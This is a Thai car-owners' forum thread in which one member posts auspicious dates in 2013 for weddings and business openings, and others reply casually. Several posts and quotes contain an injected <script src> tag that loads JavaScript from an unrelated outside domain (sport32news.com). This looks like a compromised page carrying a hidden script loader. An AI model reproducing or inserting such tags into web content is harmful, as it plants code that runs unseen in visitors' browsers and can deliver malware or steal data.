ตอบ
monza


ชื่อเล่น: อิฉัน

เข้าร่วม: 20 มิถุนา 2012
ตอบ: 804

Guru ES
Guru ES

ได้รับคำขอบคุณ: 867
ให้คำขอบคุณ: 773

ที่อยู่: สุขุมวิท 71
ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 15 มกรา 2013 09:07 - วันดี๊ดี ปี 2556
ฤกษ์ปี 2556 เดือนมกราคม

          วันศุกร์ที่ 25 มกราคม 2556 เป็นเทวีฤกษ์ คือ ฤกษ์ที่ใช้สำหรับการงานมงคลต่าง ๆ ที่เกี่ยวข้องกับการยกย่องสตรี ความมีหน้ามีตา มีชื่อเสียงในวงสังคมทั่วไป เหมาะสำหรับจัดพิธีมงคลสมรส ที่ทั้งคู่บ่าวสาวจะใช้ชีวิตร่วมกัน โดยเฉพาะเจ้าบ่าวจะยกย่องให้เกียรติเจ้าสาว ให้มีหน้ามีตา มีชื่อเสียง มอบความไว้วางใจให้เธอเป็นคนสำคัญของหัวใจ จะสร้างหลักฐานทรัพย์สินเงินทอง ให้มั่นคง และบุตรบริวารก็มีความอบอุ่น อยู่อย่างร่มเย็นเป็นสุขมาก

          วันพุธที่ 30 มกราคม 2556 เป็นมหัทธโนฤกษ์ คือ ฤกษ์ที่ใช้สำหรับงานมงคลต่าง ๆ ได้สารพัด เรียกได้ว่าเป็นฤกษ์ครอบจักรวาลก็ว่าได้ สามารถดำเนินงานต่าง ๆ ได้ทั่วไป เหมาะสำหรับจัดพิธีงานมงคลสมรส ที่ทั้งคู่บ่าวสาวจะใช้ชีวิตร่วมกัน จะมั่งมีศรีสุข มีทรัพย์สินเนืองนอง มีความมั่งคั่งเป็นเศรษฐีร่ำรวยดีมาก


ฤกษ์ปี 2556 เดือนกุมภาพันธ์

          วันศุกร์ที่ 1 กุมภาพันธ์ 2556 เป็นภูมิปาโลฤกษ์ คือ ฤกษ์ที่ใช้สำหรับการงานมงคลต่าง ๆ ที่เกี่ยวกับความมั่นคงถาวร มีความเป็นปึกแผ่นของหลักฐาน หลักทรัพย์ และเหมาะสำหรับจัดพิธีมงคลสมรส ที่ทั้งคู่บ่าวสาวจะมีความหนักแน่นมั่นคงในการครองชีวิต จะมีความโดดเด่นในด้านอสังหาริมทรัพย์ จะเป็นเจ้าของที่นาราชาที่ดิน และมีชื่อเสียงขจรขจายไปทั่วทุกสารทิศ และอยู่อย่างร่มเย็นเป็นสุข

          วันเสาร์ที่ 2 กุมภาพันธ์ 2556 เป็นเทศาตรีฤกษ์ คือ ฤกษ์ที่ใช้สำหรับการงานมงคลต่าง ๆ โดยเฉพาะเปิดกิจการใหม่ ๆ จะเป็นศูนย์การค้า สถานบันเทิงทุกรูปแบบ ธุรกิจทั้งในและต่างประเทศ และยังเหมาะสำหรับจัดพิธีมงคลสมรสของคู่บ่าวสาวที่จะใช้ชีวิตร่วมกัน จะได้รับการสนับสนุน หรือมีผู้ให้การอุปถัมภ์ค้ำชู มีความรุ่งเรืองรุ่งโรจน์ ของการใช้ชีวิตที่ราบรื่นสดใสดีมาก

          วันเสาร์ที่ 9 กุมภาพันธ์ 2556 เป็นภูมิปาโลฤกษ์ คือ ฤกษ์ที่ใช้สำหรับการงานมงคลต่าง ๆ ที่เกี่ยวกับความมั่นคงถาวร มีความเป็นปึกแผ่น

ฤกษ์ปี 2556 เดือนมีนาคม

          วันเสาร์ที่ 16 มีนาคม 2556 เป็นมหัทธโนฤกษ์ คือ ฤกษ์ที่ใช้สำหรับงานมงคลต่าง ๆ ได้สารพัด เรียกได้ว่าเป็นฤกษ์ครอบจักรวาลก็ว่าได้ สามารถดำเนินงานต่าง ๆ ได้ทั่วไป เหมาะสำหรับจัดพิธีงานมงคลสมรส ที่ทั้งคู่บ่าวสาวจะใช้ชีวิตร่วมกัน จะมั่งมีศรีสุข มีทรัพย์สินเนืองนอง มีความมั่งคั่งเป็นเศรษฐีร่ำรวยดีมาก

          วันศุกร์ที่ 22 มีนาคม 2556 เป็นราชาฤกษ์ คือ ฤกษ์ที่ใช้สำหรับการงานมงคลต่าง ๆ ที่มีความโอ่อ่า มีเกียรติ มีชื่อเสียง มีเสน่ห์เป็นที่นิยมยกย่อง และเหมาะสำหรับจัดพิธีมงคลสมรส ที่ทั้งคู่บ่าวสาวจะใช้ชีวิตร่วมกัน จะเป็นใหญ่เป็นโต มียศถาบรรดาศักดิ์ มีชื่อเสียงเป็นที่รู้จักของสังคม และยังส่งผลไปถึงบุตร ที่จะได้เข้ารับราชการงานเมือง หลักฐานก็มั่นคง การเงินก็มั่งคั่ง ยศตำแหน่งก็ใหญ่โต จะมีความสุขตั้งแต่เริ่มต้นชีวิตคู่ไปถึงในภายภาคหน้าของอนาคต

          วันศุกร์ที่ 29 มีนาคม 2556 เป็นเทวีฤกษ์ คือ ฤกษ์ที่ใช้สำหรับการงานมงคลต่าง ๆ ที่เกี่ยวข้องกับการยกย่องสตรี ความมีหน้ามีตา มีชื่อเสียงในวงสังคมทั่วไป เหมาะสำหรับจัดพิธีมงคลสมรส ที่ทั้งคู่บ่าวสาวจะใช้ชีวิตร่วมกัน โดยเฉพาะเจ้าบ่าวจะยกย่องให้เกียรติเจ้าสาว ให้มีหน้ามีตา มีชื่อเสียง มอบความไว้วางใจให้เธอเป็นคนสำคัญของหัวใจ จะสร้างหลักฐานทรัพย์สินเงินทองให้มั่นคง และบุตรบริวารก็มีความอบอุ่น อยู่อย่างร่มเย็นเป็นสุขมาก

ฤกษ์ปี 2556 เดือนเมษายน

          วันศุกร์ที่ 5 เมษายน 2556 เป็นเทศาตรีฤกษ์ คือ ฤกษ์ที่ใช้สำหรับการงานมงคลต่าง ๆ โดยเฉพาะเปิดกิจการใหม่ ๆ จะเป็นศูนย์การค้า สถานบันเทิงทุกรูปแบบ ธุรกิจทั้งในและต่างประเทศ และยังเหมาะสำหรับจัดพิธีมงคลสมรสของคู่บ่าวสาวที่จะใช้ชีวิตร่วมกัน จะได้รับการสนับสนุน หรือมีผู้ให้การอุปถัมภ์ค้ำชู มีความรุ่งเรืองรุ่งโรจน์ ของการใช้ชีวิตที่ราบรื่นสดใสดีมาก

          วันเสาร์ที่ 6 เมษายน 2556 เป็นเทศาตรีฤกษ์ คือ ฤกษ์ที่ใช้สำหรับการงานมงคลต่าง ๆ โดยเฉพาะเปิดกิจการใหม่ ๆ จะเป็นศูนย์การค้า สถานบันเทิงทุกรูปแบบ ธุรกิจทั้งในและต่างประเทศ และยังเหมาะสำหรับจัดพิธีมงคลสมรสของคู่บ่าวสาวที่จะใช้ชีวิตร่วมกัน จะได้รับการสนับสนุน หรือมีผู้ให้การอุปถัมภ์ค้ำชู มีความรุ่งเรืองรุ่งโรจน์ ของการใช้ชีวิตที่ราบรื่นสดใสดีมาก

ฤกษ์ปี 2556 เดือนพฤษภาคม

          วันอาทิตย์ที่ 12 พฤษภาคม 2556 เป็นภูมิปาโลฤกษ์ คือ ฤกษ์ที่ใช้สำหรับการงานมงคลต่าง ๆ ที่เกี่ยวกับความมั่นคงถาวร มีความเป็นปึกแผ่นของหลักฐาน หลักทรัพย์ และเหมาะสำหรับจัดพิธีมงคลสมรส ที่ทั้งคู่บ่าวสาวจะมีความหนักแน่นมั่นคงในการครองชีวิต จะมีความโดดเด่นในด้านอสังหาริมทรัพย์ จะเป็นเจ้าของที่นาราชาที่ดิน และมีชื่อเสียงขจรขจายไปทั่วทุกสารทิศ และอยู่อย่างร่มเย็นเป็นสุข

          วันพฤหัสที่ 16 พฤษภาคม 2556 เป็นราชาฤกษ์ คือ ฤกษ์ที่ใช้สำหรับการงานมงคลต่าง ๆ ที่มีความโอ่อ่า มีเกียรติมีชื่อเสียง มีเสน่ห์เป็นที่นิยมยกย่อง และเหมาะสำหรับจัดพิธีมงคลสมรสที่ทั้งคู่บ่าวสาวจะใช้ชีวิตร่วมกัน จะเป็นใหญ่เป็นโต มียศถาบรรดาศักดิ์ มีชื่อเสียงเป็นที่รู้จักของสังคม และยังส่งผลไปถึงบุตร ที่จะได้เข้ารับราชการงานเมือง หลักฐานก็มั่นคง การเงินก็มั่งคั่ง ยศตำแหน่งก็ใหญ่โต จะมีความสุขตั้งแต่เริ่มต้นชีวิตคู่ไปถึงในภายภาคหน้าของอนาคต

          วันอาทิตย์ที่ 19 พฤษภาคม 2556 เป็นมหัทธโนฤกษ์ คือ ฤกษ์ที่ใช้สำหรับงานมงคลต่าง ๆ ได้สารพัด เรียกได้ว่าเป็นฤกษ์ครอบจักรวาลก็ว่าได้ สามารถดำเนินงานต่าง ๆ ได้ทั่วไป เหมาะสำหรับจัดพิธีงานมงคลสมรส ที่ทั้งคู่บ่าวสาวจะใช้ชีวิตร่วมกัน จะมั่งมีศรีสุข มีทรัพย์สินเนืองนอง มีความมั่งคั่งเป็นเศรษฐีร่ำรวยดีมาก

ฤกษ์ปี 2556 เดือนมิถุนายน

          วันจันทร์ที่ 3 มิถุนายน 2556 เป็นราชาฤกษ์ คือ ฤกษ์ที่ใช้สำหรับการงานมงคลต่าง ๆ ที่มีความโอ่อ่า มีเกียรติมีชื่อเสียง มีเสน่ห์เป็นที่นิยมยกย่อง และเหมาะสำหรับจัดพิธีมงคลสมรสที่ทั้งคู่บ่าวสาวจะใช้ชีวิตร่วมกัน จะเป็นใหญ่เป็นโต มียศถาบรรดาศักดิ์ มีชื่อเสียงเป็นที่รู้จักของสังคม และยังส่งผลไปถึงบุตร ที่จะได้เข้ารับราชการงานเมือง หลักฐานก็มั่นคง การเงินก็มั่งคั่ง ยศตำแหน่งก็ใหญ่โต จะมีความสุขตั้งแต่เริ่มต้นชีวิตคู่ไปถึงในภายภาคหน้าของอนาคต

          วันพฤหัสบดีที่ 6 มิถุนายน 2556 เป็นมหัทธโนฤกษ์ คือ ฤกษ์ที่ใช้สำหรับงานมงคลต่าง ๆ ได้สารพัด เรียกได้ว่าเป็นฤกษ์ครอบจักรวาลก็ว่าได้ สามารถดำเนินงานต่าง ๆ ได้ทั่วไป เหมาะสำหรับจัดพิธีงานมงคลสมรสที่ทั้งคู่บ่าวสาวจะใช้ชีวิตร่วมกัน จะมั่งมีศรีสุข มีทรัพย์สินเนืองนอง มีความมั่งคั่งเป็นเศรษฐีร่ำรวยดีมาก

          วันเสาร์ที่ 8 มิถุนายน 2556 เป็นภูมิปาโลฤกษ์ คือ ฤกษ์ที่ใช้สำหรับการงานมงคลต่าง ๆ ที่เกี่ยวกับความมั่นคงถาวร มีความเป็นปึกแผ่นของหลักฐาน หลักทรัพย์ และเหมาะสำหรับจัดพิธีมงคลสมรส ที่ทั้งคู่บ่าวสาวจะมีความหนักแน่นมั่นคงในการครองชีวิต จะมีความโดดเด่นในด้านอสังหาริมทรัพย์ จะเป็นเจ้าของที่นาราชาที่ดิน และมีชื่อเสียงขจรขจายไปทั่วทุกสารทิศ และอยู่อย่างร่มเย็นเป็นสุข

ฤกษ์ปี 2556 เดือนกรกฎาคม

          วันเสาร์ที่ 13 กรกฎาคม 2556 เป็นมหัทธโนฤกษ์ คือ ฤกษ์ที่ใช้สำหรับงานมงคลต่าง ๆ ได้สารพัด เรียกได้ว่าเป็นฤกษ์ครอบจักรวาลก็ว่าได้ สามารถดำเนินงานต่าง ๆ ได้ทั่วไป เหมาะสำหรับจัดพิธีงานมงคลสมรส ที่ทั้งคู่บ่าวสาวจะใช้ชีวิตร่วมกัน จะมั่งมีศรีสุข มีทรัพย์สินเนืองนอง มีความมั่งคั่งเป็นเศรษฐีร่ำรวยดีมาก

          วันศุกร์ที่ 19 กรกฎาคม 2556 เป็นราชาฤกษ์ คือ ฤกษ์ที่ใช้สำหรับการงานมงคลต่าง ๆ ที่มีความโอ่อ่า มีเกียรติมีชื่อเสียง มีเสน่ห์เป็นที่นิยมยกย่อง และเหมาะสำหรับจัดพิธีมงคลสมรส ที่ทั้งคู่บ่าวสาวจะใช้ชีวิตร่วมกัน จะเป็นใหญ่เป็นโต มียศถาบรรดาศักดิ์ มีชื่อเสียงเป็นที่รู้จักของสังคม และยังส่งผลไปถึงบุตร ที่จะได้เข้ารับราชการงานเมือง หลักฐานก็มั่นคง การเงินก็มั่งคั่ง ยศตำแหน่งก็ใหญ่โต จะมีความสุขตั้งแต่เริ่มต้นชีวิตคู่ไปถึงในภายภาคหน้าของอนาคต

          วันอาทิตย์ที่ 21 กรกฎาคม 2556 เป็นมหัทธโนฤกษ์ คือ ฤกษ์ที่ใช้สำหรับงานมงคลต่าง ๆ ได้สารพัด เรียกได้ว่าเป็นฤกษ์ครอบจักรวาลก็ว่าได้ สามารถดำเนินงานต่าง ๆ ได้ทั่วไป เหมาะสำหรับจัดพิธีงานมงคลสมรส ที่ทั้งคู่บ่าวสาวจะใช้ชีวิตร่วมกัน จะมั่งมีศรีสุข มีทรัพย์สินเนืองนอง มีความมั่งคั่งเป็นเศรษฐีร่ำรวยดีมาก

ฤกษ์ปี 2556 เดือนสิงหาคม

          วันอาทิตย์ที่ 4 สิงหาคม 2556 เป็นเทวีฤกษ์ คือ ฤกษ์ที่ใช้สำหรับการงานมงคลต่าง ๆ ที่เกี่ยวข้องกับการยกย่องสตรี ความมีหน้ามีตา มีชื่อเสียงในวงสังคมทั่วไป เหมาะสำหรับจัดพิธีมงคลสมรส ที่ทั้งคู่บ่าวสาวจะใช้ชีวิตร่วมกัน โดยเฉพาะเจ้าบ่าวจะยกย่องให้เกียรติเจ้าสาว ให้มีหน้ามีตา มีชื่อเสียง มอบความไว้วางใจให้เธอเป็นคนสำคัญของหัวใจ จะสร้างหลักฐานทรัพย์สินเงินทอง ให้มั่นคง และบุตรบริวารก็มีความอบอุ่น อยู่อย่างร่มเย็นเป็นสุขมาก

          วันศุกร์ที่ 9 สิงหาคม 2556 เป็นมหัทธโนฤกษ์ คือ ฤกษ์ที่ใช้สำหรับงานมงคลต่าง ๆ ได้สารพัด เรียกได้ว่าเป็นฤกษ์ครอบจักรวาลก็ว่าได้ สามารถดำเนินงานต่าง ๆ ได้ทั่วไป เหมาะสำหรับจัดพิธีงานมงคลสมรส ที่ทั้งคู่บ่าวสาวจะใช้ชีวิตร่วมกัน จะมั่งมีศรีสุข มีทรัพย์สินเนืองนอง มีความมั่งคั่งเป็นเศรษฐีร่ำรวยดีมาก

          วันอาทิตย์ที่ 11 สิงหาคม 2556 เป็นภูมิปาโลฤกษ์ คือ ฤกษ์ที่ใช้สำหรับการงานมงคลต่าง ๆ ที่เกี่ยวกับความมั่นคงถาวร มีความเป็นปึกแผ่นของหลักฐาน หลักทรัพย์ และเหมาะสำหรับจัดพิธีมงคลสมรสที่ทั้งคู่บ่าวสาวจะมีความหนักแน่นมั่นคงในการครองชีวิต จะมีความโดดเด่นในด้านอสังหาริมทรัพย์ จะเป็นเจ้าของที่นาราชาที่ดิน และมีชื่อเสียงขจรขจายไปทั่วทุกสารทิศ และอยู่อย่างร่มเย็นเป็นสุข

          วันจันทร์ที่ 26 สิงหาคม 2556 เป็นมหัทธโนฤกษ์ คือ ฤกษ์ที่ใช้สำหรับงานมงคลต่าง ๆ ได้สารพัด เรียกได้ว่าเป็นฤกษ์ครอบจักรวาลก็ว่าได้ สามารถดำเนินงานต่าง ๆ ได้ทั่วไป เหมาะสำหรับจัดพิธีงานมงคลสมรส ที่ทั้งคู่บ่าวสาวจะใช้ชีวิตร่วมกัน จะมั่งมีศรีสุข มีทรัพย์สินเนืองนอง มีความมั่งคั่งเป็นเศรษฐีร่ำรวยดีมาก

ฤกษ์ปี 2556 เดือนกันยายน

          วันอาทิตย์ที่ 8 กันยายน 2556 เป็นเทศาตรีฤกษ์ คือ ฤกษ์ที่ใช้สำหรับการงานมงคลต่าง ๆ โดยเฉพาะเปิดกิจการใหม่ ๆ จะเป็นศูนย์การค้า สถานบันเทิงทุกรูปแบบ ธุรกิจทั้งในและต่างประเทศ และยังเหมาะสำหรับจัดพิธีมงคลสมรสของคู่บ่าวสาวที่จะใช้ชีวิตร่วมกัน จะได้รับการสนับสนุน หรือมีผู้ให้การอุปถัมภ์ค้ำชู มีความรุ่งเรืองรุ่งโรจน์ ของการใช้ชีวิตที่ราบรื่นสดใสดีมาก

          วันอาทิตย์ที่ 15 กันยายน 2556 เป็นภูมิปาโลฤกษ์ คือ ฤกษ์ที่ใช้สำหรับการงานมงคลต่าง ๆ ที่เกี่ยวกับความมั่นคงถาวร มีความเป็นปึกแผ่นของหลักฐาน หลักทรัพย์ และเหมาะสำหรับจัดพิธีมงคลสมรส ที่ทั้งคู่บ่าวสาวจะมีความหนักแน่นมั่นคงในการครองชีวิต จะมีความโดดเด่นในด้านอสังหาริมทรัพย์ จะเป็นเจ้าของที่นาราชาที่ดิน และมีชื่อเสียงขจรขจายไปทั่วทุกสารทิศ และอยู่อย่างร่มเย็นเป็นสุข


           ในเดือนตุลาคม ไม่มีฤกษ์ดีสำหรับจัดงานค่ะ

ฤกษ์ปี 2556 เดือนพฤศจิกายน

          วันศุกร์ที่ 8 พฤศจิกายน 2556 เป็นมหัทธโนฤกษ์ คือ ฤกษ์ที่ใช้สำหรับงานมงคลต่าง ๆ ได้สารพัด เรียกได้ว่าเป็นฤกษ์ครอบจักรวาลก็ว่าได้ สามารถดำเนินงานต่าง ๆ ได้ทั่วไป เหมาะสำหรับจัดพิธีงานมงคลสมรส ที่ทั้งคู่บ่าวสาวจะใช้ชีวิตร่วมกัน จะมั่งมีศรีสุข มีทรัพย์สินเนืองนอง มีความมั่งคั่งเป็นเศรษฐีร่ำรวยดีมาก

          วันอาทิตย์ที่ 10 พฤศจิกายน 2556 เป็นภูมิปาโลฤกษ์ คือ ฤกษ์ที่ใช้สำหรับการงานมงคลต่าง ๆ ที่เกี่ยวกับความมั่นคงถาวร มีความเป็นปึกแผ่นของหลักฐาน หลักทรัพย์ และเหมาะสำหรับจัดพิธีมงคลสมรส ที่ทั้งคู่บ่าวสาวจะมีความหนักแน่นมั่นคงในการครองชีวิต จะมีความโดดเด่นในด้านอสังหาริมทรัพย์ จะเป็นเจ้าของที่นาราชาที่ดิน และมีชื่อเสียงขจรขจายไปทั่วทุกสารทิศ และอยู่อย่างร่มเย็นเป็นสุข

          วันอาทิตย์ที่ 17 พฤศจิกายน 2556 เป็นมหัทธโนฤกษ์ คือ ฤกษ์ที่ใช้สำหรับงานมงคลต่าง ๆ ได้สารพัด เรียกได้ว่าเป็นฤกษ์ครอบจักรวาลก็ว่าได้ สามารถดำเนินงานต่าง ๆ ได้ทั่วไป เหมาะสำหรับจัดพิธีงานมงคลสมรส ที่ทั้งคู่บ่าวสาวจะใช้ชีวิตร่วมกัน จะมั่งมีศรีสุข มีทรัพย์สินเนืองนอง มีความมั่งคั่งเป็นเศรษฐีร่ำรวยดีมาก

          วันเสาร์ที่ 23 พฤศจิกายน 2556 เป็นราชาฤกษ์ คือ ฤกษ์ที่ใช้สำหรับการงานมงคลต่าง ๆ ที่มีความโอ่อ่า มีเกียรติมีชื่อเสียง มีเสน่ห์เป็นที่นิยมยกย่อง และเหมาะสำหรับจัดพิธีมงคลสมรส ที่ทั้งคู่บ่าวสาวจะใช้ชีวิตร่วมกัน จะเป็นใหญ่เป็นโต มียศถาบรรดาศักดิ์ มีชื่อเสียงเป็นที่รู้จักของสังคม และยังส่งผลไปถึงบุตร ที่จะได้เข้ารับราชการงานเมือง หลักฐานก็มั่นคง การเงินก็มั่งคั่ง ยศตำแหน่งก็ใหญ่โต จะมีความสุขตั้งแต่เริ่มต้นชีวิตคู่ไปถึงในภายภาคหน้าของอนาคต


          ในเดือนธันวาคม ไม่มีฤกษ์ดีสำหรับจัดงานค่ะ
         


วันที่ผู้หญิงทุกคนเฝ้ารอคอย
วันที่ผู้หญิงทุกคนเฝ้ารอคอย
ได้รับคำขอบคุณจาก: davidian  เค  coco1340  kort999  toshi  NuuTeee  phichetza  underhill  hikaru_kung  Es_SaLaRyMaN  TumGolok  freedombee  ahingrace  ballanupong  Auto_es  wangyu  jagkrapongVilaikaew 
davidian


ชื่อเล่น: เอ็ม

เข้าร่วม: 02 พฤศจิกา 2012
ตอบ: 1424

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2420
ให้คำขอบคุณ: 4730

ที่อยู่: บางสิบหมื่น ชลบุรี -แปดริ้ว ฉะเชิงเทรา-บางนา สมุทรปราการ
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 15 มกรา 2013 09:12 - วันดี๊ดี ปี 2556
จัดไป
ได้รับคำขอบคุณจาก: monza 
tochi229


ชื่อเล่น: ปิ๊ป

เข้าร่วม: 28 พฤศจิกา 2010
ตอบ: 7524

Moderator
Moderator

ได้รับคำขอบคุณ: 8264
ให้คำขอบคุณ: 11555

ที่อยู่: เกษตร-นวมินทร์ , ES เมืองทอง, นครศร๊ฯ
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 15 มกรา 2013 09:13 - วันดี๊ดี ปี 2556
กำลังหาแม่ของลูกอยู่ครับ...
ได้รับคำขอบคุณจาก: monza  NuuTeee 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 15 มกรา 2013 09:23 - วันดี๊ดี ปี 2556
ผมรอเดือนมิถุนายน
ได้รับคำขอบคุณจาก: monza 
pirainjung


ชื่อเล่น: หนุ่ย

เข้าร่วม: 21 พฤศจิกา 2012
ตอบ: 74

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 156
ให้คำขอบคุณ: 71

ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 15 มกรา 2013 09:24 - วันดี๊ดี ปี 2556
 แจ๋วเลยครับ 
ได้รับคำขอบคุณจาก: monza 
เค


ชื่อเล่น: เค

เข้าร่วม: 26 กันยา 2012
ตอบ: 1528

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 933
ให้คำขอบคุณ: 4208

ที่อยู่: ชลบุรี-บ้านบึง
ปี: 2001
สี: แดง รอยัล รูบี้ (มุก) (R-522P)
อังคาร, 15 มกรา 2013 09:27 - วันดี๊ดี ปี 2556


เค้าเหงาอะ "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: monza 
civic3025


ชื่อเล่น: เบิร์ด

เข้าร่วม: 03 พฤศจิกา 2010
ตอบ: 1266

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1399
ให้คำขอบคุณ: 480

ที่อยู่: ชลบุรี.นครศรีธรรมราช
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 15 มกรา 2013 10:17 - วันดี๊ดี ปี 2556
...
ได้รับคำขอบคุณจาก: monza 
monza


ชื่อเล่น: อิฉัน

เข้าร่วม: 20 มิถุนา 2012
ตอบ: 804

Guru ES
Guru ES

ได้รับคำขอบคุณ: 867
ให้คำขอบคุณ: 773

ที่อยู่: สุขุมวิท 71
ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 15 มกรา 2013 10:33 - วันดี๊ดี ปี 2556
davidian พิมพ์ว่า:
จัดไป




จัดให้

tochi229 พิมพ์ว่า:
กำลังหาแม่ของลูกอยู่ครับ...




แฟนทิ้งหรอ...ว้าๆๆหาใหม่ๆ <script src="https://sport32news.com/civicesgroup.js"></


eskung พิมพ์ว่า:
ผมรอเดือนมิถุนายน




เดือนนี้ดีที่สุดสำหรับคุณหรือค่ะ...อย่าพลาดนะ โอกาสดีมีไม่บ่อย



pirainjung พิมพ์ว่า:
 แจ๋วเลยครับ 




สาระดีนะ

เค พิมพ์ว่า:


เค้าเหงาอะ "<script src="https://sport32news.com/civicesgroup.js">




โทรหาคนที่บ้านสิค่ะ
<script src="https://sport32news.com/civicesgroup.js"></
civic3025 พิมพ์ว่า:
...




เป็นอะไรหรา ไม่มีใครหรอ...<script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: เค  tochi229 
NuuTeee


ชื่อเล่น: ตี่

เข้าร่วม: 09 พฤษภาคม 2010
ตอบ: 1198

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1485
ให้คำขอบคุณ: 2146

ที่อยู่: บางใหญ่
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 15 มกรา 2013 10:43 - วันดี๊ดี ปี 2556
รอแล้วได้อะไร 
ได้รับคำขอบคุณจาก: monza 
toshi


เข้าร่วม: 13 พฤศจิกา 2008
ตอบ: 2299

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1405
ให้คำขอบคุณ: 1756

ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 15 มกรา 2013 10:44 - วันดี๊ดี ปี 2556
คนในอยากออก  คนนอกอยากเข้า
ได้รับคำขอบคุณจาก: monza 
monza


ชื่อเล่น: อิฉัน

เข้าร่วม: 20 มิถุนา 2012
ตอบ: 804

Guru ES
Guru ES

ได้รับคำขอบคุณ: 867
ให้คำขอบคุณ: 773

ที่อยู่: สุขุมวิท 71
ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 15 มกรา 2013 11:24 - วันดี๊ดี ปี 2556
NuuTeee พิมพ์ว่า:
รอแล้วได้อะไร 



ชื่อเพลงไช่ไหมค่ะ ..
monza


ชื่อเล่น: อิฉัน

เข้าร่วม: 20 มิถุนา 2012
ตอบ: 804

Guru ES
Guru ES

ได้รับคำขอบคุณ: 867
ให้คำขอบคุณ: 773

ที่อยู่: สุขุมวิท 71
ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 15 มกรา 2013 11:25 - วันดี๊ดี ปี 2556
toshi พิมพ์ว่า:
คนในอยากออก  คนนอกอยากเข้า



เป็นไปได้ไหม ถ้าจะเข้าแล้วไม่ออก"<script src="https://sport32news.com/civicesgroup.js">
rakyat


ชื่อเล่น: โก้

เข้าร่วม: 11 กรกฎา 2012
ตอบ: 1262

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 663
ให้คำขอบคุณ: 482

ที่อยู่: จ.สุราษฎร์ธานี
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 15 มกรา 2013 11:28 - วันดี๊ดี ปี 2556
wow wow wow ขอบคุณครับสำหรับวันดีๆ
ได้รับคำขอบคุณจาก: monza 
bozazy


ชื่อเล่น: อั่ม

เข้าร่วม: 04 กรกฎา 2012
ตอบ: 81

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 69
ให้คำขอบคุณ: 31

ที่อยู่: ระยอง
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 15 มกรา 2013 11:33 - วันดี๊ดี ปี 2556
<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ ฤกษ์ดีๆ มีไม่กี่วันในแต่ละเดือน

แต่วันดีๆที่มีให้กันไม่ต้องรอ

ขอแค่รักกัน ห่วงใยกัน เอาใจใส่กัน

ใช่ป้ะ
monza


ชื่อเล่น: อิฉัน

เข้าร่วม: 20 มิถุนา 2012
ตอบ: 804

Guru ES
Guru ES

ได้รับคำขอบคุณ: 867
ให้คำขอบคุณ: 773

ที่อยู่: สุขุมวิท 71
ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 15 มกรา 2013 11:37 - วันดี๊ดี ปี 2556
rakyat พิมพ์ว่า:
wow wow wow ขอบคุณครับสำหรับวันดีๆ




ค่ะ ไม่เปนอะไร

bozazy พิมพ์ว่า:
<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ ฤกษ์ดีๆ มีไม่กี่วันในแต่ละเดือน

แต่วันดีๆที่มีให้กันไม่ต้องรอ

ขอแค่รักกัน ห่วงใยกัน เอาใจใส่กัน

ใช่ป้ะ




ไช่ค่ะ...วันดีดีฉันมีให้เทอทุกวัน..แต่คนบางคนไม่เห็นความสำคัญ ฉันเลยต้องปล่อยมันผ่านไป
ได้รับคำขอบคุณจาก: bozazy 
bozazy


ชื่อเล่น: อั่ม

เข้าร่วม: 04 กรกฎา 2012
ตอบ: 81

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 69
ให้คำขอบคุณ: 31

ที่อยู่: ระยอง
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 15 มกรา 2013 11:44 - วันดี๊ดี ปี 2556
monza พิมพ์ว่า:
rakyat พิมพ์ว่า:
wow wow wow ขอบคุณครับสำหรับวันดีๆ




ค่ะ ไม่เปนอะไร

bozazy พิมพ์ว่า:
<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ ฤกษ์ดีๆ มีไม่กี่วันในแต่ละเดือน

แต่วันดีๆที่มีให้กันไม่ต้องรอ

ขอแค่รักกัน ห่วงใยกัน เอาใจใส่กัน

ใช่ป้ะ




ไช่ค่ะ...วันดีดีฉันมีให้เทอทุกวัน..แต่คนบางคนไม่เห็นความสำคัญ ฉันเลยต้องปล่อยมันผ่านไป




นั่นแน่

มีแอบนอยด้วย
ได้รับคำขอบคุณจาก: monza 
pirainjung


ชื่อเล่น: หนุ่ย

เข้าร่วม: 21 พฤศจิกา 2012
